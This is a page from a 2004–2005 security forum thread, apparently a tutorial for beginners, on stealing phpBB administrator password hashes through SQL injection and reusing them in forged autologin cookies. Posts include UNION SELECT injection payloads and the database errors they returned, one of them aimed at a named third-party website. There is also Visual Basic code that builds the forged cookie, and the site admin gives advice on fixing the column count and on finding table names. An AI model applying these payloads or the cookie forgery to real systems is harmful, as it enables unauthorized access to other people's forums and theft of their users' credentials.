Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
December 11, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 257
Members: 0
Total: 257
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to use gathered md5 hash? Step-by-step tutorial 4 n00bs Goto page Previous  1, 2, 3, 4, 5  Next
Post new topic  Reply to topic View previous topic :: View next topic 
yes
PostPosted: Sat Jul 24, 2004 1:29 am Reply with quote
l3az3ouze
Beginner
Beginner
 
Joined: Jul 23, 2004
Posts: 2




i used to try this SQL vuln, in many phpbb websites, but i found that when i'm usin a normal user md5 it works 100%, but when i'm using an Admin md5 pass in the cookies, it doesn't log me in!!!!!
maybe there is a second username or password, isn't it?
View user's profile Send private message
PostPosted: Sat Jul 24, 2004 9:25 am Reply with quote
zer0-c00l
Advanced user
Advanced user
 
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




Code:
Could not query private message post information

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 272 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 272 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 247
File : /home/********/public_html/forum/privmsg.php
 


????
View user's profile Send private message
PostPosted: Sun Jul 25, 2004 12:23 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Seems like modified sql query. Try to add "null"-s one-by-one, till you stop have getting error message "different count of columns".
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Sep 12, 2004 3:12 pm Reply with quote
dj_wolf
Beginner
Beginner
 
Joined: Sep 05, 2004
Posts: 2




what mean this word in text and how can get uidsize :
Dim uidsize As String
Dim uid As String
Dim md5hash As String

Private Sub Command1_Click()
uid = Text1.Text
uidsize = Len(uid)
md5hash = Text2.Text

Text3.Text = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + md5hash + "%22%3Bs%3A6%3A%22userid%22%3Bs%3A" + uidsize + "%3A%22" + uid + "%22%3B%7D"
End Sub

_________________
dsfdsf
View user's profile Send private message Yahoo Messenger
PostPosted: Mon Sep 13, 2004 4:20 am Reply with quote
morrowasted
Regular user
Regular user
 
Joined: Sep 06, 2004
Posts: 10




Can this exploit also be used for XMB?

_________________
I'm new to all this, sorry for my dumbness.
View user's profile Send private message AIM Address
PostPosted: Mon Sep 13, 2004 7:49 pm Reply with quote
dj_wolf
Beginner
Beginner
 
Joined: Sep 05, 2004
Posts: 2




HI I DONT GET admin's md5 hasH PLZ HELP I USE THIS LINK BUT I DONT

I USE THIS LINK FOR SITE XXX AND GET ME THE TXT BUT I CANT REALEAS THE MD5 HASH BECAUSE EACH TIME GET ME THE OTHER MD5 HASH:


http://www.funiran.com/farsi-forum/search.php?search_id=1%20union%20select%%2020concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11<br%20/>%205,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11<br%20/>%201,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,<br%20/>%2059,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115<br%20/>%20,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5<br%20/>%208,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59<br%20/>%20,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9<br%20/>7,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[uid


RESULT:

SQL Error : 1064 You have an error in your SQL syntax near 'union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99' at line 3

SELECT search_array FROM phpbb_forumsearch_results WHERE search_id = 1 union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11
5,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11
1,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,
59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115
,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5
8,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59
,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9
7,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=[uid AND session_id = 'd5c932ff29bdc9cc2d018c811d494043'

_________________
dsfdsf
View user's profile Send private message Yahoo Messenger
PostPosted: Fri Oct 29, 2004 6:07 pm Reply with quote
zyon
Beginner
Beginner
 
Joined: Oct 28, 2004
Posts: 1




hi.
i hope i won't ask too much if i ask for more hints here.
how to provoke these various mysql error messages?
i really need help on this. Confused

waraxe wrote:
Well, you have sql injection case allready, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...


kranium wrote:
well thx for your help, u rule

but one little question. I was trying using your knowledge but I've got this error:

Quote:
SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist


so it sems that this guys have some kind of prefix in their tables, and i can't figure it out

so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...

if you can help with some magic query i'll be very gratefull Very Happy

sorry my bad english and keep your excelent work
View user's profile Send private message
Mozilla doesn't accept edited cookies
PostPosted: Thu Nov 11, 2004 9:08 am Reply with quote
Dieselboy
Beginner
Beginner
 
Joined: Nov 11, 2004
Posts: 1




..


Last edited by Dieselboy on Wed Jul 20, 2005 3:35 pm; edited 1 time in total

_________________
You will respect my authority!
View user's profile Send private message
PostPosted: Fri Apr 01, 2005 8:47 pm Reply with quote
TheRipper
Regular user
Regular user
 
Joined: Mar 25, 2005
Posts: 6




does it works with phpbb 2.0.13 ?? Rolling Eyes
View user's profile Send private message
PostPosted: Sat Apr 02, 2005 1:32 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Have not tested, but it will work, uneless phpbb developers are not taken some countermeasures Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 02, 2005 12:17 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




TheRipper wrote:
does it works with phpbb 2.0.13 ?? Rolling Eyes


if u can steal the admin ids Smile

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Apr 11, 2005 3:48 pm Reply with quote
TheRipper
Regular user
Regular user
 
Joined: Mar 25, 2005
Posts: 6




i have both Laughing (taken from an old database) but i don't know if the passw it's still the same Embarassed
View user's profile Send private message
PostPosted: Tue Apr 12, 2005 8:55 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




So wait a minute... Did someone just stumble across a 2.0.13 exploit or is it yet another false alarm? Sad

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 29, 2005 1:56 am Reply with quote
w00t
Beginner
Beginner
 
Joined: Apr 29, 2005
Posts: 1




Hey,

Ive been interested in this for a while, but its never worked for me. I can gain the hashes, edit all required information, but it just never logs me in, i always log in to my account.

Im thinking this may be because of updated version(s) or firefox (im running 2.0.3). Is there any browsers anyone can reccomend?
View user's profile Send private message
PostPosted: Fri May 20, 2005 8:20 am Reply with quote
Twinky
Regular user
Regular user
 
Joined: May 20, 2005
Posts: 5




i try this... but the md5 hashhes doesnt display in the url Confused
View user's profile Send private message
How to use gathered md5 hash? Step-by-step tutorial 4 n00bs
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 3 of 5  
Goto page Previous  1, 2, 3, 4, 5  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Book Opinions
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.100 Seconds